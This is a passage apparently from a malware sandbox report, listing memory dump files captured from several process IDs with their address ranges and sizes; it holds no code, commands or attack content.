    • memory/3536-825-0x000000007ECD0000-0x000000007ECE0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3536-798-0x0000000072F60000-0x000000007364E000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/3536-799-0x0000000000B30000-0x0000000000B40000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3536-800-0x0000000000B30000-0x0000000000B40000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3536-820-0x000000006FC90000-0x000000006FCDB000-memory.dmp

      Filesize

      300KB

      Download

    • memory/3536-821-0x000000006FCE0000-0x0000000070030000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3536-828-0x0000000000B30000-0x0000000000B40000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3536-1037-0x0000000072F60000-0x000000007364E000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/3744-1799-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3744-1803-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3852-2474-0x0000000000400000-0x0000000003130000-memory.dmp

      Filesize

      45.2MB

      Download

    • memory/3852-2631-0x0000000000400000-0x0000000003130000-memory.dmp

      Filesize

      45.2MB

      Download

    • memory/4116-585-0x0000000004CC0000-0x00000000050BF000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/4116-302-0x0000000004CC0000-0x00000000050BF000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/4116-823-0x0000000000400000-0x0000000003130000-memory.dmp

      Filesize

      45.2MB

      Download

    • memory/4116-1041-0x0000000000400000-0x0000000003130000-memory.dmp

      Filesize

      45.2MB

      Download

    • memory/4116-304-0x0000000000400000-0x0000000003130000-memory.dmp

      Filesize

      45.2MB

      Download

    • memory/4456-1050-0x0000000072EC0000-0x00000000735AE000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/4456-1048-0x0000000004700000-0x0000000004710000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4456-1049-0x0000000004700000-0x0000000004710000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4696-2739-0x00000000002D0000-0x0000000000B9D000-memory.dmp

      Filesize

      8.8MB

      Download

    • memory/4836-1796-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/4928-586-0x0000000004B20000-0x0000000004B30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4928-558-0x0000000004B20000-0x0000000004B30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4928-557-0x0000000004B20000-0x0000000004B30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4928-579-0x000000006FC90000-0x000000006FCDB000-memory.dmp

      Filesize

      300KB

      Download

    • memory/4928-556-0x0000000072F60000-0x000000007364E000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/4928-578-0x000000007EC90000-0x000000007ECA0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4928-580-0x000000006FCE0000-0x0000000070030000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4928-795-0x0000000072F60000-0x000000007364E000-memory.dmp

      Filesize

      6.9MB

      Download